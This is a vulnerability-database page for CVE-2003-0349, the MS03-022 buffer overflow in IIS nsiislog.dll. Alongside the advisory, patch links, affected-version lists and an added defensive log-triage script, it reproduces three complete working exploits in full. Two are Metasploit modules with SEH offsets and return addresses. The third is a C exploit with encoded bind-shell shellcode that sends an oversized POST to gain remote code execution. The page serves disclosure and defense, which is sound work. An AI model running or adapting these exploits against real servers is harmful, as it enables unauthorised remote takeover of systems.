CVE-2003-0349
CVSS 7.5
Published: 2003-07-24 00:00:00
Revised: 2016-10-17 22:32:54

[Original] Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll.


[CNNVD] Windows Media Services NSIISlog.DLL Oversized Header Remote Buffer Overflow Vulnerability (MS03-022) (CNNVD-200307-025)

Microsoft Windows Media Services is a service included with Microsoft Windows 2000 Server, Advanced Server and Datacenter Server that delivers media content to clients over the network via multicast streams.
The ISAPI extension of Microsoft Windows Media Services contains a buffer overflow in its handling of client requests. A remote attacker can exploit it to cause a denial of service against the service or to execute arbitrary instructions.
To record client information for multicast streams, Windows 2000 provides a logging capability for multicast and unicast transmissions. This capability is implemented as an ISAPI extension, nsiislog.dll, which is installed into the IIS scripts directory when Windows Media Services is installed on a Windows NT 4.0 server or on Windows 2000 via Add/Remove Programs. The nsiislog.dll installed on Windows 2000 has a buffer overflow when processing oversized POST request data; an attacker who sends a malformed request to the server can make IIS stop responding to Internet requests or execute arbitrary instructions.
Windows Media Services is not installed on Windows 2000 by default.
Note: this is not the same vulnerability as the one described in MS03-019.
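A defender-side triage script for the pattern described above, added here as an example and not code from CNNVD, Microsoft or any of the exploits on this page: it parses IIS W3C Extended log lines and flags POST requests to nsiislog.dll whose request size exceeds a threshold. The enabled log fields, the 8192-byte cut-off and the sample log lines are assumptions constructed for the example.

```python
"""Triage IIS W3C Extended log lines for oversized POST requests to
nsiislog.dll (the CVE-2003-0349 / MS03-022 pattern).

Added example for this page, not code from CNNVD, Microsoft or Metasploit.
Assumptions: the IIS site logs in W3C Extended format with the cs-bytes
field enabled; the 8192-byte threshold is a constructed cut-off chosen
because the public exploits on this page place their overwrite roughly
10000-14000 bytes into the POST body, far larger than any legitimate
MX_STATS_LogLine entry.
"""
from typing import Dict, Iterable, List

SUSPECT_BYTES = 8192  # constructed threshold, see module docstring


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Parse W3C Extended log lines using the most recent #Fields directive."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # #Software, #Version, #Date directives
        values = line.split()
        if not fields or len(values) != len(fields):
            continue  # malformed line: skip rather than guess at columns
        records.append(dict(zip(fields, values)))
    return records


def is_suspect(rec: Dict[str, str]) -> bool:
    """True for a POST to any path containing nsiislog.dll whose request
    size exceeds SUSPECT_BYTES. Only the file name is matched because the
    extension may live under a renamed scripts directory."""
    if rec.get("cs-method", "").upper() != "POST":
        return False
    if "nsiislog.dll" not in rec.get("cs-uri-stem", "").lower():
        return False
    try:
        return int(rec.get("cs-bytes", "0")) > SUSPECT_BYTES
    except ValueError:
        return False


def triage(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return the parsed records that match the oversized-POST pattern."""
    return [r for r in parse_w3c(lines) if is_suspect(r)]


# Constructed sample excerpt (not a real capture). The third and fourth data
# lines mimic the request sizes the public exploits use; the rest are benign.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-06-26 10:00:00
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs(User-Agent) cs-bytes
2003-06-26 10:00:01 192.0.2.10 GET /default.htm 200 Mozilla/4.0 312
2003-06-26 10:00:05 192.0.2.11 POST /scripts/nsiislog.dll 200 NSPlayer/7.0 214
2003-06-26 10:00:09 192.0.2.12 POST /scripts/nsiislog.dll 500 NSPlayer/4.1.0.3917 10211
2003-06-26 10:00:12 192.0.2.13 POST /renamed_scripts/nsiislog.dll 200 NSPlayer/2.0 16384
2003-06-26 10:00:15 192.0.2.14 GET /scripts/nsiislog.dll 200 Mozilla/4.0 9999
"""

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG.splitlines()):
        print(hit["date"], hit["time"], hit["c-ip"], hit["cs-uri-stem"], hit["cs-bytes"])
```

A 500 status on such a request is consistent with the extension crashing, but the size alone is the signal: the benign NSPlayer log line on the second data line stays well under the threshold.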
        

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:938 IIS5.0 Windows Media Services Large POST Vulnerability
*The OVAL definition describes the method for detecting this vulnerability in detail; see the related OVAL definition for more technical details on detection.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0349
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0349
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-025
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=105665030925504&w=2
(UNKNOWN)  BUGTRAQ  20030626 Windows Media Services Remote Command Execution #2
http://securitytracker.com/id?1007059
(UNKNOWN)  SECTRACK  1007059
http://www.kb.cert.org/vuls/id/113716
(UNKNOWN)  CERT-VN  VU#113716
http://www.microsoft.com/technet/security/bulletin/ms03-022.asp
(VENDOR_ADVISORY)  MS  MS03-022
http://www.ntbugtraq.com/default.asp?pid=36&sid=1&A2=ind0306&L=NTBUGTRAQ&P=R4563
(VENDOR_ADVISORY)  NTBUGTRAQ  20030626 Windows Media Services Remote Command Execution #2

- Vulnerability information

Windows Media Services NSIISlog.DLL Oversized Header Remote Buffer Overflow Vulnerability (MS03-022)
High risk  Boundary condition error
2003-07-24 00:00:00 2005-10-20 00:00:00
Remote ※ Local

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
* Temporarily remove or disable nsiislog.dll; this does not affect normal operation of Media Services.
Vendor patch:
Microsoft
---------
Microsoft has released a security bulletin (MS03-022) and the corresponding patch for this issue:
MS03-022: Flaw in ISAPI Extension for Windows Media Services Could Cause Code Execution (Q822343)
Link:
http://www.microsoft.com/technet/security/bulletin/MS03-022.asp

Patch download:
Microsoft Windows 2000:

http://microsoft.com/downloads/details.aspx?FamilyId=F772E131-BBC9-4B34-9E78-F71D9742FED8&displaylang=en

- Vulnerability information (16355)

Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow (EDBID:16355)
windows remote
2010-07-25 Verified
0 metasploit
N/A [Download]
##
# $Id: ms03_022_nsiislog_post.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::BruteTargets
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
			'Description'    => %q{
					This exploits a buffer overflow found in the nsiislog.dll
				ISAPI filter that comes with Windows Media Server. This
				module will also work against the 'patched' MS03-019
				version. This vulnerability was addressed by MS03-022.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					[ 'CVE', '2003-0349'],
					[ 'OSVDB', '4535'],
					[ 'BID', '8035'],
					[ 'MSB', 'MS03-022'],
					[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# SEH offsets by version (Windows 2000)
					# 4.1.0.3917 =  9992
					# 4.1.0.3920 =  9992
					# 4.1.0.3927 =  9992
					# 4.1.0.3931 = 14092

					['Brute Force',            { }],
					['Windows 2000 -MS03-019', { 'Rets' => [  9988, 0x40f01333 ] }],
					['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }],
					['Windows XP   -MS03-019', { 'Rets' => [  9992, 0x40f011e0 ] }],
				],
			'DisclosureDate' => 'Jun 25 2003',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('URL', [ true,  "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
			], self.class)
	end

	def check
		res = send_request_raw({
			'uri' => datastore['URL']
		}, -1)

		if (res and res.body =~ /NetShow ISAPI/)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end

	def exploit_target(target)

		# Create a buffer greater than max SEH offset (16384)
		pst = rand_text_alphanumeric(256) * 64

		# Create SEH frame and insert into buffer
		seh = generate_seh_payload(target['Rets'][1])
		pst[target['Rets'][0], seh.length] = seh

		# Send it to the server
		print_status("Sending request...")
		res = send_request_cgi({
			'uri'          => datastore['URL'],
			'method'       => 'POST',
			'user-agent'   => 'NSPlayer/2.0',
			'content-type' => 'application/x-www-form-urlencoded',
			'data'         => pst
		}, 5)

		select(nil,nil,nil,1)

		handler
		disconnect
	end

end
		

- Vulnerability information (22837)

Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow (EDBID:22837)
windows remote
2003-06-25 Verified
0 firew0rker
N/A [Download]
source: http://www.securityfocus.com/bid/8035/info

Microsoft has reported a buffer overflow vulnerability in Windows Media Services. This is due to a problem with how the logging ISAPI extension handles incoming client requests. This could cause arbitrary code execution in IIS, which is exploitable through Media Services.

// Windows Media Services Remote Command Execution #2 
// v. 1.0 beta 
// (c) firew0rker  //tN  [The N0b0D1eS] 

#include <stdio.h> 
#include <string.h> 
#include <stdlib.h> 

#ifdef WIN32 
#include <winsock.h> 
#pragma comment(lib, "wsock32") 
#else 
#include <sys/socket.h> 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#include <unistd.h> 
#define SOCKET int 
#define DWORD uint32_t 
#define ULONG unsigned long 
#define INVALID_SOCKET -1 
#define SOCKET_ERROR -1 
#define closesocket close 
#endif 

char shellcode[]= 
//"\x90\x90\x90\x90\x90\x90\x90\xCC" // for debugging
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff" 
"\xff\x5b\x81\xeb\x4d\x43\x22\x11" 
"\x8b\xc3\x05\x66\x43\x22\x11\x66" 
"\xb9\x15\x03\x80\x30\xfb\x40\x67" 
"\xe2\xf9\x33\xa3\xf9\xfb\x72\x66" 
"\x53\x06\x04\x04\x76\x66\x37\x06" 
"\x04\x04\xa8\x40\xf6\xbd\xd9\xea" 
"\xf8\x66\x53\x06\x04\x04\xa8\x93" 
"\xfb\xfb\x04\x04\x13\x91\xfa\xfb" 
"\xfb\x43\xcd\xbd\xd9\xea\xf8\x7e" 
"\x53\x06\x04\x04\xab\x04\x6e\x37" 
"\x06\x04\x04\xf0\x3b\xf4\x7f\xbe" 
"\xfa\xfb\xfb\x76\x66\x3b\x06\x04" 
"\x04\xa8\x40\xba\xbd\xd9\xea\xf8" 
"\x66\x53\x06\x04\x04\xa8\xab\x13" 
"\xcc\xfa\xfb\xfb\x76\x7e\x8f\x05" 
"\x04\x04\xab\x93\xfa\xfa\xfb\xfb" 
"\x04\x6e\x4b\x06\x04\x04\xc8\x20" 
"\xa8\xa8\xa8\x91\xfd\x91\xfa\x91" 
"\xf9\x04\x6e\x3b\x06\x04\x04\x72" 
"\x7e\xa7\x05\x04\x04\x9d\x3c\x7e" 
"\x9f\x05\x04\x04\xf9\xfb\x9d\x3c" 
"\x7e\x9d\x05\x04\x04\x73\xfb\x3c" 
"\x7e\x93\x05\x04\x04\xfb\xfb\xfb" 
"\xfb\x76\x66\x9f\x05\x04\x04\x91" 
"\xeb\xa8\x04\x4e\xa7\x05\x04\x04" 
"\x04\x6e\x47\x06\x04\x04\xf0\x3b" 
"\x8f\xe8\x76\x6e\x9c\x05\x04\x04" 
"\x05\xf9\x7b\xc1\xfb\xf4\x7f\x46" 
"\xfb\xfb\xfb\x10\x2f\x91\xfa\x04" 
"\x4e\xa7\x05\x04\x04\x04\x6e\x43" 
"\x06\x04\x04\xf0\x3b\xf4\x7e\x5e" 
"\xfb\xfb\xfb\x3c\x7e\x9b\x05\x04" 
"\x04\xeb\xfb\xfb\xfb\x76\x7e\x9b" 
"\x05\x04\x04\xab\x76\x7e\x9f\x05" 
"\x04\x04\xab\x04\x4e\xa7\x05\x04" 
"\x04\x04\x6e\x4f\x06\x04\x04\x72" 
"\x7e\xa3\x05\x04\x04\x07\x76\x46" 
"\xf3\x05\x04\x04\xc8\x3b\x42\xbf" 
"\xfb\xfb\xfb\x08\x51\x3c\x7e\xcf" 
"\x05\x04\x04\xfb\xfa\xfb\xfb\x70" 
"\x7e\xa3\x05\x04\x04\x72\x7e\xbf" 
"\x05\x04\x04\x72\x7e\xb3\x05\x04" 
"\x04\x72\x7e\xbb\x05\x04\x04\x3c" 
"\x7e\xf3\x05\x04\x04\xbf\xfb\xfb" 
"\xfb\xc8\x20\x76\x7e\x03\x06\x04" 
"\x04\xab\x76\x7e\xf3\x05\x04\x04" 
"\xab\xa8\xa8\x93\xfb\xfb\xfb\xf3" 
"\x91\xfa\xa8\xa8\x43\x8c\xbd\xd9" 
"\xea\xf8\x7e\x53\x06\x04\x04\xab" 
"\xa8\x04\x6e\x3f\x06\x04\x04\x04" 
"\x4e\xa3\x05\x04\x04\x04\x6e\x57" 
"\x06\x04\x04\x12\xa0\x04\x04\x04" 
"\x04\x6e\x33\x06\x04\x04\x13\x76" 
"\xfa\xfb\xfb\x33\xef\xfb\xfb\xac" 
"\xad\x13\xfb\xfb\xfb\xfb\x7a\xd7" 
"\xdf\xf9\xbe\xd9\xea\x43\x0e\xbe" 
"\xd9\xea\xf8\xff\xdf\x78\x3f\xff" 
"\xab\x9f\x9c\x04\xcd\xfb\xfb\x72" 
"\x9e\x03\x13\xfb\xfb\xfb\xfb\x7a" 
"\xd7\xdf\xd8\xbe\xd9\xea\x43\xac" 
"\xbe\xd9\xea\xf8\xff\xdf\x78\x3f" 
"\xff\x72\xbe\x07\x9f\x9c\x72\xdd" 
"\xfb\xfb\x70\x86\xf3\x9d\x7a\xc4" 
"\xb6\xa1\x8e\xf4\x70\x0c\xf8\x8d" 
"\xc7\x7a\xc5\xab\xbe\xfb\xfb\x8e" 
"\xf9\x10\xf3\x7a\x14\xfb\xfb\xfa" 
"\xfb\x10\x19\x72\x86\x0b\x72\x8e" 
"\x17\x70\x86\xf7\x42\x6d\xfb\xfb" 
"\xfb\xc9\x3b\x09\x55\x72\x86\x0f" 
"\x70\x34\xd0\xb6\xf7\x70\xad\x83" 
"\xf8\xae\x0b\x70\xa1\xdb\xf8\xa6" 
"\x0b\xc8\x3b\x70\xc0\xf8\x86\x0b" 
"\x70\x8e\xf7\xaa\x08\x5d\x8e\xfe" 
"\x78\x3f\xff\x10\xf1\xa2\x78\x38" 
"\xff\xbb\xc0\xb9\xe3\x8e\x1f\xc0" 
"\xb9\xe3\x8e\xf9\x10\xb8\x70\x89" 
"\xdf\xf8\x8e\x0b\x2a\x1b\xf8\x3d" 
"\xf4\x4c\xfb\x70\x81\xe7\x3a\x1b" 
"\xf9\xf8\xbe\x0b\xf8\x3c\x70\xfb" 
"\xf8\xbe\x0b\x70\xb6\x0f\x72\xb6" 
"\xf7\x70\xa6\xeb\x72\xf8\x78\x96" 
"\xeb\xff\x70\x8e\x17\x7b\xc2\xfb" 
"\x8e\x7c\x9f\x9c\x74\xfd\xfb\xfb" 
"\x78\x3f\xff\xa5\xa4\x32\x39\xf7" 
"\xfb\x70\x86\x0b\x12\x99\x04\x04" 
"\x04\x33\xfb\xfb\xfb\x70\xbe\xeb" 
"\x7a\x53\x67\xfb\xfb\xfb\xfb\xfb" 
"\xfa\xfb\x43\xfb\xfb\xfb\xfb\x32" 
"\x38\xb7\x94\x9a\x9f\xb7\x92\x99" 
"\x89\x9a\x89\x82\xba\xfb\xbe\x83" 
"\x92\x8f\xab\x89\x94\x98\x9e\x88" 
"\x88\xfb\xb8\x89\x9e\x9a\x8f\x9e" 
"\xab\x89\x94\x98\x9e\x88\x88\xba" 
"\xfb\xfb\xac\xa8\xc9\xa4\xc8\xc9" 
"\xd5\xbf\xb7\xb7\xfb\xac\xa8\xba" 
"\xa8\x94\x98\x90\x9e\x8f\xba\xfb" 
"\x99\x92\x95\x9f\xfb\x97\x92\x88" 
"\x8f\x9e\x95\xfb\x9a\x98\x98\x9e" 
"\x8b\x8f\xfb\xac\xa8\xba\xa8\x8f" 
"\x9a\x89\x8f\x8e\x8b\xfb\x98\x97" 
"\x94\x88\x9e\x88\x94\x98\x90\x9e" 
"\x8f\xfb\xfb\x98\x96\x9f\xfb\xe9" 
"\xc4\xfc\xff\xff\x74\xf9\x75\xf7"; 


const DWORD default_EIP_pos = 9992; // position of EIP within the buffer (sploit)
const DWORD default_EBX_points_to = 9988; // where EBX points, relative to sploit
//const DWORD default_EIP_value = 0x77F8441B; // this address should hold a JMP EDX, here inside ntdll.dll
const DWORD default_EIP_value = 0x40F01333;
//const default_EDX_points_to = 0x1000; // this turned out not to be needed
char *nsiislog_default = "/scripts/nsiislog.dll"; 
char sploit[default_EIP_pos+4+sizeof(shellcode)+1]; 
char sploitbuf[sizeof(sploit)*2]; 

void usage(char* argv[]) 
{ 
       printf("Dicklamer (: " 
   "We are not responsible for the illegal use of this software.\n" 
   "Description: Binds shell to port 34816 (or higher if port busy).\n" 
   "Usage:   " 
   "%s target [-p target_port] [-r /renamed_scripts/renamed_nsiislog.dll]\n" 
   "Supported target(s):\n" 
   "Windows version\t\t\t\tnsiislog.dll version\n" 
   "------------------------------------------------------------\n" 
   "2000 [5.00.2195] server rus.\t\t4.1.0.3917\n", argv[0]); 
       exit(0); 
} 

int main(int argc, char* argv[]) 
{ 
#ifdef WIN32 
   WSADATA wsaData;        
#endif 
   int target_port = 80; 
   char *nsiislog = nsiislog_default; 
   int      nArgIndex; 

   if (argc<2) usage(argv); 
   nArgIndex = 1; 
   while ((nArgIndex < argc)&&(strlen(argv[nArgIndex])>=2)&&(argv[nArgIndex][0]=='-')) 
   { 
      switch (argv[nArgIndex++][1]) 
      { 
      case 'p': 
      case 'P': 
         target_port = atoi(argv[nArgIndex++]); 
         continue; 
      case 'r': 
      case 'R': 
         nsiislog = argv[nArgIndex++]; 
         continue; 
      default: 
         usage(argv); 
      } 
   } 
    
   try { 
#ifdef WIN32 
      WSAStartup(0x0101, &wsaData); 
#endif 
      SOCKET s = socket(AF_INET,SOCK_STREAM,0); 
      if (s == INVALID_SOCKET) throw("No socket"); 
      sockaddr_in addr; 
       
      // determine the server's address
      ULONG iaddr = inet_addr(argv[1]); 
      if (iaddr == INADDR_NONE) {// the address is a hostname
         hostent *ph = gethostbyname(argv[1]); 
         if (!ph) throw("Cant resolve hostname"); 
         memcpy(&addr.sin_addr.s_addr,ph->h_addr_list[0],sizeof(in_addr)); 
      } else {// the address is an IP
         memcpy(&addr.sin_addr.s_addr,&iaddr,4); 
      }; 
       
      addr.sin_family = AF_INET; 
      addr.sin_port   = htons(target_port); 
      int sizeofaddr=sizeof(addr); 

char *req = "MX_STATS_LogLine: "; 
strcpy(sploit, req); 
memset(sploit+strlen(sploit), 0xCC, default_EIP_pos-strlen(req)); 
//memcpy(sploit+default_EDX_points_to, shellcode, sizeof(shellcode)-1/* without the trailing \0 */);
memcpy(sploit+default_EBX_points_to-(sizeof(shellcode)-1)+4, shellcode, sizeof(shellcode)-1/* without the trailing \0 */);
// when control transfers to EIP, EBX will point at the last DWORD of our request, where the JZ/JNZ is
memcpy(sploit+default_EIP_pos, &default_EIP_value, sizeof default_EIP_value); 
       
      /*strcpy(sploit+sizeof(sploit)-11,"BCDEFGHIJK");*/ 
      sploit[sizeof(sploit)-1] = 0; 
       
  if (connect(s,(struct sockaddr*)&addr,sizeof(struct sockaddr)) == SOCKET_ERROR) throw("Cant connect host"); 

      sprintf(sploitbuf, 
         "POST %s HTTP/1.0\r\n" 
         "Accept: */*\r\n" 
         "User-Agent: NSPlayer/4.1.0.3917\r\n" 
         "Content-Type: text/plain\r\n" 
         "Content-Length: %i\r\n" 
         "Pragma: xClientGUID={89f451e0-a491-4346-ad78-4d55aac89045}\r\n" 
         "\r\n%s\r\n", 
         nsiislog,strlen(sploit),sploit); 
       
      int snd=send(s,sploitbuf,strlen(sploitbuf),0); 
      if (snd == strlen(sploitbuf)) printf("Target exploited.\n"); 
         else throw("Cant send exploit"); 
      closesocket(s); 
   } 
   catch (char *errmsg) 
   { 
       
      printf("%s\n",errmsg); 
      return -1; 
   } 
   catch (int err_n) 
   { 
      printf("error %i\n",err_n); 
      return err_n; 
   } 
#ifdef WIN32 
    WSACleanup(); 
#endif 
   return 0; 
} 
		

- Vulnerability information (F92137)

Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow (PacketStormID:F92137)
2010-07-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows
CVE-2003-0349
[Download]

This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This Metasploit module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.

    

- Vulnerability information (F83155)

Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow (PacketStormID:F83155)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows
CVE-2003-0349
[Download]

This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This Metasploit module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote


	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Remote::BruteTargets
	include Msf::Exploit::Remote::Seh
	
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow',
			'Description'    => %q{
				This exploits a buffer overflow found in the nsiislog.dll
				ISAPI filter that comes with Windows Media Server. This
				module will also work against the 'patched' MS03-019
				version. This vulnerability was addressed by MS03-022.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0349'],
					[ 'OSVDB', '4535'],
					[ 'BID', '8035'],
					[ 'MSB', 'MS03-022'],
					[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
					'StackAdjustment' => -3500,

				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					# SEH offsets by version (Windows 2000)
					# 4.1.0.3917 =  9992
					# 4.1.0.3920 =  9992
					# 4.1.0.3927 =  9992		
					# 4.1.0.3931 = 14092
									
					['Brute Force',            { }],
					['Windows 2000 -MS03-019', { 'Rets' => [  9988, 0x40f01333 ] }],
					['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }],
					['Windows XP   -MS03-019', { 'Rets' => [  9992, 0x40f011e0 ] }],
				],
			'DisclosureDate' => 'Jun 25 2003',
			'DefaultTarget'  => 0))
			
			register_options(
				[
					OptString.new('URL', [ true,  "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]),
				], self.class)			
	end
	
	def check
		res = send_request_raw({
			'uri' => datastore['URL']
		}, -1)
		
		if (res and res.body =~ /NetShow ISAPI/)
			return Exploit::CheckCode::Detected
		end
		return Exploit::CheckCode::Safe
	end
	
	def exploit_target(target)

		# Create a buffer greater than max SEH offset (16384)
		pst = rand_text_alphanumeric(256) * 64

		# Create SEH frame and insert into buffer
		seh = generate_seh_payload(target['Rets'][1])
		pst[target['Rets'][0], seh.length] = seh

		# Send it to the server
		print_status("Sending request...")
		res = send_request_cgi({
			'uri'          => datastore['URL'],
			'method'       => 'POST',
			'user-agent'   => 'NSPlayer/2.0',
			'content-type' => 'application/x-www-form-urlencoded',
			'data'         => pst
		}, 5)

		sleep(1)
		
		handler
		disconnect
	end

end
    

- Vulnerability information

4535
Microsoft Media Services ISAPI nsiislog.dll POST Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

Windows Media Services contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is due to a flaw in the ISAPI (Internet Services Application Programming Interface) extension handling of incoming client requests in the nsiislog.dll file of the Internet Information Services (IIS). With a specially crafted POST request, an attacker may create a denial of service or execute arbitrary code.

- Timeline

2003-06-25 2003-05-28
2003-06-25 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- References

- Vulnerability author

- Vulnerability information

Microsoft Windows Media Services NSIISlog.DLL Remote Buffer Overflow Vulnerability
Boundary Condition Error 8035
Yes Yes
2003-06-25 12:00:00 2009-07-11 10:56:00
Discovery of this vulnerability has been credited to Brett Moore.

- Affected program versions

Microsoft Windows NT 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Terminal Server 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
